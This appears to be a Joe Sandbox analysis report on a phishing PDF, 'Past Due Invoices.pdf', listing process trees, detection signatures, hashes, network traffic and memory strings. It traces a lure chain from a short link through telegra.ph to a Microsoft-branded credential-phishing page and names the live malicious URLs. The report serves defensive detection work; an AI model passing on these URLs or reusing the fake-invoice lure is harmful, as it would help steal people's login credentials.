Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Past Due Invoices.pdf

Overview

General Information

Sample Name:Past Due Invoices.pdf
Analysis ID:626309
MD5:fedf390692465b96a151685cc467ae62
SHA1:d983b3484bab16f4d2b2318066e009d0126050e1
SHA256:abbe28038526ba0fe28b0f39d224acaa67fb003adda280932939596c72833936
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Antivirus detection for URL or domain
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Potential document exploit detected (unknown TCP traffic)
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTML body contains low number of good links
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • AcroRd32.exe (PID: 5268 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\Past Due Invoices.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
    • AcroRd32.exe (PID: 6452 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\Desktop\Past Due Invoices.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
    • RdrCEF.exe (PID: 1772 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 1320 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=12571384739979517490 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12571384739979517490 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 596 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=10574597507145346706 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 6684 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=17550103462985370468 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17550103462985370468 --renderer-client-id=4 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • RdrCEF.exe (PID: 6072 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1527127842774311388 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1527127842774311388 --renderer-client-id=5 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
    • chrome.exe (PID: 6788 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation -- "https://lnkd.in/dptWHpAa MD5: C139654B5C1438A95B321BB01AD63EF6)
      • chrome.exe (PID: 584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
16391.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://karmarejoice.com/lopi/office-RD117/SlashNext: Label: Credential Stealing type: Phishing & Social usering

    Phishing

    barindex
    Source: https://karmarejoice.com/lopi/office-RD117/Matcher: Template: microsoft matched with high similarity
    Source: Yara matchFile source: 16391.1.pages.csv, type: HTML
    Source: https://karmarejoice.com/lopi/office-RD117/Matcher: Template: microsoft matched
    Source: https://karmarejoice.com/lopi/office-RD117/Matcher: Found strong image similarity, brand: Microsoft image: 16391.1.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: HTML title missing
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: HTML title missing
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: Number of links: 0
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: Number of links: 0
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: No <meta name="author".. found
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: No <meta name="author".. found
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: No <meta name="copyright".. found
    Source: https://karmarejoice.com/lopi/office-RD117/HTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\6788_754440086\LICENSE.txtJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
    Source: unknownHTTPS traffic detected: 149.154.164.13:443 -> 192.168.2.6:49876 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.164.13:443 -> 192.168.2.6:49877 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.219.60:443 -> 192.168.2.6:49911 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.219.60:443 -> 192.168.2.6:49910 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.6:49912 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.53.43.226:443 -> 192.168.2.6:49914 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.6:49845 -> 13.107.42.14:443
    Source: global trafficDNS query: name: lnkd.in
    Source: global trafficTCP traffic: 192.168.2.6:49845 -> 13.107.42.14:443
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 13.107.219.60 13.107.219.60
    Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: Ruleset Data.26.drString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
    Source: Filtering Rules.26.dr, Ruleset Data.26.drString found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
    Source: Filtering Rules.26.drString found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cipa.jp/exif/1.0/
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cipa.jp/exif/1.0/1.0/4
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/k
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/field#
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/8
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/?
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/schema#P
    Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/type#
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfe/ns/id/
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.npes.org/pdfx/ns/id/
    Source: AcroRd32.exe, 00000001.00000000.538137621.000000000B367000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quicktime.com.Acrobat
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/#8:m
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/883m
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/l:
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/g7
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/k8
    Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/r9
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://accounts.google.com
    Source: craw_window.js.26.drString found in binary or memory: https://accounts.google.com/MergeSession
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.drString found in binary or memory: https://ajax.googleapis.com
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.echosign.com
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.echosign.comameArraF~
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://apis.google.com
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://clients2.google.com
    Source: manifest.json.26.dr, manifest.json1.26.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://clients2.googleusercontent.com
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.drString found in binary or memory: https://content-autofill.googleapis.com
    Source: LICENSE.txt.26.drString found in binary or memory: https://creativecommons.org/.
    Source: LICENSE.txt.26.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
    Source: b5404c6c-4576-4a9f-a871-af26967eb4e2.tmp.27.dr, 219afb8a-eb1f-4550-9f5b-ca9c25c9cc68.tmp.27.dr, e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://dns.google
    Source: LICENSE.txt.26.drString found in binary or memory: https://easylist.to/)
    Source: d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://fonts.googleapis.com
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://fonts.gstatic.com
    Source: LICENSE.txt.26.drString found in binary or memory: https://github.com/easylist)
    Source: craw_background.js.26.dr, craw_window.js.26.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
    Source: AcroRd32.exe, 00000001.00000000.487309761.0000000008E26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ims-na1.adobelogin.com
    Source: AcroRd32.exe, 00000001.00000000.535754924.000000000AD32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lnkd.in/dptWHpAa
    Source: AcroRd32.exe, 00000001.00000000.532130124.0000000008FA4000.00000004.00000001.00020000.00000000.sdmp, Past Due Invoices.pdfString found in binary or memory: https://lnkd.in/dptWHpAa)
    Source: History Provider Cache.26.drString found in binary or memory: https://lnkd.in/dptWHpAa2
    Source: AcroRd32.exe, 00000001.00000000.535754924.000000000AD32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lnkd.in/dptWHpAay
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://ogs.google.com
    Source: craw_window.js.26.dr, manifest.json1.26.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.drString found in binary or memory: https://r3---sn-5hne6nzk.gvt1.com
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.drString found in binary or memory: https://redirector.gvt1.com
    Source: craw_window.js.26.dr, manifest.json1.26.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://ssl.gstatic.com
    Source: History Provider Cache.26.drString found in binary or memory: https://telegra.ph/Past-Due-Invoice-05-132
    Source: craw_background.js.26.dr, craw_window.js.26.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://www.google.com
    Source: manifest.json1.26.drString found in binary or memory: https://www.google.com/
    Source: craw_window.js.26.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
    Source: craw_window.js.26.drString found in binary or memory: https://www.google.com/images/cleardot.gif
    Source: craw_window.js.26.drString found in binary or memory: https://www.google.com/images/dot2.gif
    Source: craw_window.js.26.drString found in binary or memory: https://www.google.com/images/x2.gif
    Source: craw_background.js.26.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
    Source: craw_background.js.26.dr, craw_window.js.26.dr, e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://www.googleapis.com
    Source: manifest.json1.26.drString found in binary or memory: https://www.googleapis.com/
    Source: manifest.json1.26.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
    Source: manifest.json1.26.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
    Source: manifest.json1.26.drString found in binary or memory: https://www.googleapis.com/auth/sierra
    Source: manifest.json1.26.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
    Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drString found in binary or memory: https://www.gstatic.com
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: unknownDNS traffic detected: queries for: lnkd.in
    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dptWHpAa HTTP/1.1Host: lnkd.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Past-Due-Invoice-05-13 HTTP/1.1Host: telegra.phConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /css/quill.core.min.css HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /css/core.min.css?46 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/jquery.min.js HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
